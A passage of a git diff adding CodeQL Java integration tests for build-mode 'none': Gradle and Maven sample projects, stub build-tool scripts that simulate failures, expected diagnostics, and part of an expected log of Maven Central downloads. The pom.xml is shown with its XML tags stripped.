'api' +include 'services:webservice' +*/ + +rootProject.name = 'gradle-sample' diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/source_archive.expected b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/source_archive.expected new file mode 100644 index 000000000000..9862217a0594 --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/source_archive.expected @@ -0,0 +1,2 @@ +src/main/java/com/example/App.java +src/test/java/com/example/AppTest.java diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/main/java/com/example/App.java b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/main/java/com/example/App.java new file mode 100644 index 000000000000..1c13f7d885e5 --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/main/java/com/example/App.java @@ -0,0 +1,14 @@ +/* + * This Java source file was generated by the Gradle 'init' task. + */ +package com.example; + +public class App { + public String getGreeting() { + return "Hello world."; + } + + public static void main(String[] args) { + System.out.println(new App().getGreeting()); + } +} diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/test/java/com/example/AppTest.java b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/test/java/com/example/AppTest.java new file mode 100644 index 000000000000..813bc5e1a2ae --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/src/test/java/com/example/AppTest.java @@ -0,0 +1,14 @@ +/* + * This Java source file was generated by the Gradle 'init' task. + */ +package com.example; + +import org.junit.Test; +import static org.junit.Assert.*; + +public class AppTest { + @Test public void testAppHasAGreeting() { + App classUnderTest = new App(); + assertNotNull("app should have a greeting", classUnderTest.getGreeting()); + } +} diff --git a/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/test.py b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/test.py new file mode 100644 index 000000000000..e59277f3ea36 --- /dev/null +++ b/java/ql/integration-tests/java/gradle-sample-without-wrapper-or-gradle-buildless/test.py @@ -0,0 +1,17 @@ +import tempfile +import runs_on +import pathlib + + +# The version of gradle used doesn't work on java 17 +def test(codeql, use_java_11, java, environment): + gradle_override_dir = pathlib.Path(tempfile.mkdtemp()) + if runs_on.windows: + (gradle_override_dir / "gradle.bat").write_text("@echo off\nexit /b 2\n") + else: + gradlepath = gradle_override_dir / "gradle" + gradlepath.write_text("#!/bin/bash\nexit 1\n") + gradlepath.chmod(0o0755) + + environment.add_path(gradle_override_dir) + codeql.database.create(build_mode = "none") diff --git a/java/ql/integration-tests/java/maven-download-failure/.gitattributes b/java/ql/integration-tests/java/maven-download-failure/.gitattributes new file mode 100644 index 000000000000..36e4b9d7df91 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/.gitattributes @@ -0,0 +1,6 @@ +# +# https://help.github.com/articles/dealing-with-line-endings/ +# +# These are explicitly windows files and should use crlf +*.bat text eol=crlf +*.cmd text eol=crlf diff --git a/java/ql/integration-tests/java/maven-download-failure/diagnostics.expected b/java/ql/integration-tests/java/maven-download-failure/diagnostics.expected new file mode 100644 index 000000000000..daabe47a9e9f --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/diagnostics.expected @@ -0,0 +1,84 @@ +{ + "markdownMessage": "Java analysis used build tool Maven to pick a JDK version and/or to recommend external dependencies.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/using-build-tool-advice", + "name": "Java analysis used build tool Maven to pick a JDK version and/or to recommend external dependencies" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis used the system default JDK.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/jdk-system-default", + "name": "Java analysis used the system default JDK" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java analysis with build-mode 'none' completed.", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/complete", + "name": "Java analysis with build-mode 'none' completed" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "Java was extracted with build-mode set to 'none'. This means that all Java source in the working directory will be scanned, with build tools such as Maven and Gradle only contributing information about external dependencies.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/mode-active", + "name": "Java was extracted with build-mode set to 'none'" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} +{ + "markdownMessage": "Reading the dependency graph from build files provided 2 classpath entries", + "severity": "unknown", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/depgraph-provided-by-maven", + "name": "Java analysis extracted precise dependency graph information from tool Maven" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": false, + "telemetry": true + } +} +{ + "markdownMessage": "The maven-enforcer-plugin recommended a specific Maven version be used. Trying to download it failed; extraction will continue, but retrieving dependency information from Maven may fail if the system default version is incompatible with project build scripts. Consider checking if a firewall configuration or similar is preventing downloading the required version.", + "severity": "note", + "source": { + "extractorName": "java", + "id": "java/autobuilder/buildless/maven-download-failed", + "name": "Java analysis failed to download a Maven version recommended by the maven-enforcer-plugin" + }, + "visibility": { + "cliSummaryTable": true, + "statusPage": true, + "telemetry": true + } +} diff --git a/java/ql/integration-tests/java/maven-download-failure/mvn b/java/ql/integration-tests/java/maven-download-failure/mvn new file mode 100755 index 000000000000..83f2d832f240 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/mvn @@ -0,0 +1,10 @@ +#!/bin/bash + +>&2 echo "Running mvn wrapper script" + +if [ "$2" == "dependency:copy" ]; then + >&2 echo "Arguments ($@) look like a dependency:copy command; failing" + exit 1 +fi + +${REAL_MVN_PATH} "$@" diff --git a/java/ql/integration-tests/java/maven-download-failure/mvn.cmd b/java/ql/integration-tests/java/maven-download-failure/mvn.cmd new file mode 100755 index 000000000000..740817413368 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/mvn.cmd @@ -0,0 +1 @@ +@bash mvn %* diff --git a/java/ql/integration-tests/java/maven-download-failure/pom.xml b/java/ql/integration-tests/java/maven-download-failure/pom.xml new file mode 100644 index 000000000000..ca376ad5ba9d --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/pom.xml @@ -0,0 +1,133 @@ + + + + 4.0.0 + + com.example + maven-sample + 1.0-SNAPSHOT + + maven-sample + + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + junit + junit + 4.11 + test + + + + + + + exec-maven-plugin + org.codehaus.mojo + 1.1.1 + + + check-maven-version + package + + java + + + + + com.example.App + + + + com.diffplug.spotless + spotless-maven-plugin + 2.19.1 + + + + check + + compile + + + + + + /* FAIL ME */ + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + enforce-maven + + enforce + + + + + [3.1.1,) + + + + + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + diff --git a/java/ql/integration-tests/java/maven-download-failure/source_archive.expected b/java/ql/integration-tests/java/maven-download-failure/source_archive.expected new file mode 100644 index 000000000000..0a86ff54645c --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/source_archive.expected @@ -0,0 +1,7 @@ +pom.xml +src/main/java/com/example/App.java +src/main/resources/my-app.properties +src/main/resources/page.xml +src/main/resources/struts.xml +src/test/java/com/example/AppTest.java +test-db/working/settings.xml diff --git a/java/ql/integration-tests/java/maven-download-failure/src/main/java/com/example/App.java b/java/ql/integration-tests/java/maven-download-failure/src/main/java/com/example/App.java new file mode 100644 index 000000000000..c9eec918587c --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/src/main/java/com/example/App.java @@ -0,0 +1,30 @@ +package com.example; + +import java.util.regex.Pattern; +import java.nio.file.Path; +import java.nio.file.Paths; + +/** + * Hello world! + * + */ +public class App +{ + public static void main( String[] args ) + { + System.out.println( "Hello World!" ); + String expectedVersion = System.getenv("EXPECT_MAVEN"); + Path mavenHome = Paths.get(System.getProperty("maven.home")).normalize(); + String observedVersion = mavenHome.getFileName().toString(); + if (expectedVersion != null && !expectedVersion.equals(observedVersion)) { + System.err.println("Wrong maven version, expected '" + expectedVersion + "' but got '" + observedVersion + "'" + mavenHome); + System.exit(1); + } + String commandMatcher = System.getenv("EXPECT_COMMAND_REGEX"); + String command = System.getProperty("sun.java.command"); + if (commandMatcher != null && !Pattern.matches(commandMatcher, command)) { + System.err.println("Wrong command line, '" + command + "' does not match '" + commandMatcher + "'"); + System.exit(1); + } + } +} diff --git a/java/ql/integration-tests/java/maven-download-failure/src/main/resources/my-app.properties b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/my-app.properties new file mode 100644 index 000000000000..e566b49a29a8 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/my-app.properties @@ -0,0 +1 @@ +version=1.0 diff --git a/java/ql/integration-tests/java/maven-download-failure/src/main/resources/page.xml b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/page.xml new file mode 100644 index 000000000000..2bab459cb031 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/page.xml @@ -0,0 +1,8 @@ + + +A sample + + +

    Hello world!

    + + diff --git a/java/ql/integration-tests/java/maven-download-failure/src/main/resources/struts.xml b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/struts.xml new file mode 100644 index 000000000000..73fc0c6b9cb6 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/src/main/resources/struts.xml @@ -0,0 +1,4 @@ + + +This is a sample file + diff --git a/java/ql/integration-tests/java/maven-download-failure/src/test/java/com/example/AppTest.java b/java/ql/integration-tests/java/maven-download-failure/src/test/java/com/example/AppTest.java new file mode 100644 index 000000000000..22a94ca6f01c --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/src/test/java/com/example/AppTest.java @@ -0,0 +1,20 @@ +package com.example; + +import static org.junit.Assert.assertTrue; + +import org.junit.Test; + +/** + * Unit test for simple App. + */ +public class AppTest +{ + /** + * Rigorous Test :-) + */ + @Test + public void shouldAnswerWithTrue() + { + assertTrue( true ); + } +} diff --git a/java/ql/integration-tests/java/maven-download-failure/test.py b/java/ql/integration-tests/java/maven-download-failure/test.py new file mode 100644 index 000000000000..a86d970e3fe0 --- /dev/null +++ b/java/ql/integration-tests/java/maven-download-failure/test.py @@ -0,0 +1,14 @@ +import os +import os.path +import shutil + +def test(codeql, java, check_diagnostics): + + # Avoid shutil resolving mvn to the wrapper script in the test dir: + os.environ["NoDefaultCurrentDirectoryInExePath"] = "0" + runenv = { + "PATH": os.path.realpath(os.path.dirname(__file__)) + os.pathsep + os.getenv("PATH"), + "REAL_MVN_PATH": shutil.which("mvn"), + } + del os.environ["NoDefaultCurrentDirectoryInExePath"] + codeql.database.create(build_mode = "none", _env = runenv) diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/maven-fetches.expected b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/maven-fetches.expected new file mode 100644 index 000000000000..dab45b38bf7e --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/maven-fetches.expected @@ -0,0 +1,541 @@ +Downloaded from central: https://repo.maven.apache.org/maven2/avalon-framework/avalon-framework/4.1.3/avalon-framework-4.1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.6/commons-beanutils-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.0/commons-collections-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.1/commons-collections-2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2/commons-collections-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.6/commons-digester-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-digester/commons-digester/1.8/commons-digester-1.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.11.0/commons-io-2.11.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.15.1/commons-io-2.15.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.16.1/commons-io-2.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.2/commons-io-2.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.4/commons-io-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.5/commons-io-2.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.4/commons-lang-2.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0.3/commons-logging-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.0/commons-logging-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.1/commons-logging-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/dom4j/dom4j/1.1/dom4j-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/3.8.2/junit-3.8.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.11/junit-4.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/junit/junit/4.12/junit-4.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/log4j/log4j/1.2.12/log4j-1.2.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/logkit/logkit/1.0.1/logkit-1.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache-extras/beanshell/bsh/2.0b6/bsh-2.0b6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/11/apache-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/15/apache-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/16/apache-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/18/apache-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/19/apache-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/20/apache-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/21/apache-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/23/apache-23.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/25/apache-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/27/apache-27.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/29/apache-29.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/3/apache-3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/30/apache-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/31/apache-31.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/32/apache-32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/4/apache-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/5/apache-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/6/apache-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/7/apache-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/9/apache-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.11/commons-compress-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-compress/1.26.1/commons-compress-1.26.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.14.0/commons-lang3-3.14.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-lang3/3.8.1/commons-lang3-3.8.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/24/commons-parent-24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/25/commons-parent-25.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/34/commons-parent-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/39/commons-parent-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/42/commons-parent-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/47/commons-parent-47.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/52/commons-parent-52.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/64/commons-parent-64.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/65/commons-parent-65.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/66/commons-parent-66.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/69/commons-parent-69.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-parent/9/commons-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/commons/commons-text/1.12.0/commons-text-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-client/4.5.13/httpcomponents-client-4.5.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.13/httpcomponents-core-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-core/4.4.14/httpcomponents-core-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcomponents-parent/11/httpcomponents-parent-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.13/httpcore-4.4.13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.8/apache-maven-3.8.8-bin.zip +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.8/apache-maven-3.8.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-core/1.11.1/doxia-core-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-decoration-model/1.11.1/doxia-decoration-model-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-integration-tools/1.11.1/doxia-integration-tools-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.11.1/doxia-logging-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-logging-api/1.12.0/doxia-logging-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml/1.11.1/doxia-module-xhtml-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-module-xhtml5/1.11.1/doxia-module-xhtml5-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-modules/1.11.1/doxia-modules-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0-alpha-7/doxia-sink-api-1.0-alpha-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.0/doxia-sink-api-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.11.1/doxia-sink-api-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sink-api/1.12.0/doxia-sink-api-1.12.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-site-renderer/1.11.1/doxia-site-renderer-1.11.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/doxia/doxia-sitetools/1.11.1/doxia-sitetools-1.11.1.pom +Downloaded from central: 